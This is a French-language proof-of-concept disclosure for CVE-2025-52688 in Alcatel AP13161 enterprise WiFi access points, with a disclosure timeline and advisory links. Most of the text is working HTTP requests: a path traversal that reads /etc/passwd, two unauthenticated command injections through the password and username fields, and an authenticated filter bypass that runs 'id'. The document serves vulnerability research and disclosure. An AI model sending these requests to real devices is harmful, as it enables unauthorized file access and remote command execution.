
Exploits de preuve de concept pour CVE-2025-52688 : vulnérabilités d'injection de commande non authentifiée et de lecture arbitraire de fichiers dans les points d'accès WiFi d'entreprise Alcatel AP13161, découvertes lors d'un hackathon IoT/OT.
Alcatel AP13161 - Point d'accès WiFi d'entreprise
Il y a 2 vulnérabilités principales traitées ici :
; pour provoquer une attaque par injection de commandesfileName qui permet une lecture non autorisée de fichiers arbitraires sur le serveurCette vulnérabilité a été découverte lors du Hackathon IoT/OT SPIRICYBER-24 organisé par la CSA (Agence de cybersécurité de Singapour) et la NTU
Le paramètre fileName permet à tout utilisateur non authentifié de visualiser n'importe quel fichier sur le système. En parcourant les répertoires, nous pouvons lire des fichiers sensibles sur le serveur
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"username":"xxx",
"method":"downloader.cert",
"params":{
"fileName":"/../../etc/passwd"
}
}
Le paramètre password sur le point de terminaison /apiaccess est vulnérable à une injection de commandes non authentifiée qui permet à tout utilisateur non authentifié d'exécuter des commandes système
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{
"id":1,
"jsonrpc":"2.0",
"method":"system.getPvc",
"params":{
"username": "Administrator",
"password":";echo pwned1234 > /tmp/test.txt"
}
}
Le paramètre username sur le point de terminaison echo.fcgi est vulnérable à une injection de commandes non authentifiée qui permet à tout utilisateur non authentifié d'exécuter des commandes système
POST /echo.fcgi HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*
{
"id":1,
"jsonrpc":"2.0",
"username":"Administrator",
"method":"user.logout",
"params":{
"username": ";echo pwned > /tmp/test.txt",
"Sessionid":""
}
}
Le paramètre command permet aux utilisateurs authentifiés d'exécuter des fonctions et des binaires système pour tester la fonctionnalité du lampadaire. Cependant, en raison d'un filtrage insuffisant des entrées et d'une liste noire, nous pouvons contourner les filtres pour exécuter une exécution de code à distance authentifiée qui permet à tout utilisateur connecté d'exécuter des commandes système
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"method":"expressmessage.call",
"username":"Administrator",
"session":"XXXXXX",
"topic":"WMA/DC:XXXXXXX",
"params":{
"version":"3.0",
"messageID":1,
"macAddress":"DC:XXXXX",
"option":"update",
"method":"ap_manage.exce_command",
"contents":{
"command":"tech_support_command 9 127.0.0.1\nid"
}
}
}
2024-08-10 : Rapport soumis à l'équipe de triage du Hackathon IoT SpiritCyber
2024-08-20 : Rapport accepté par l'équipe de triage
2025-06-25 : CSA SingCert attribue CVE-2025-52688
2025-07-14 : Divulgation publique
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072
https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf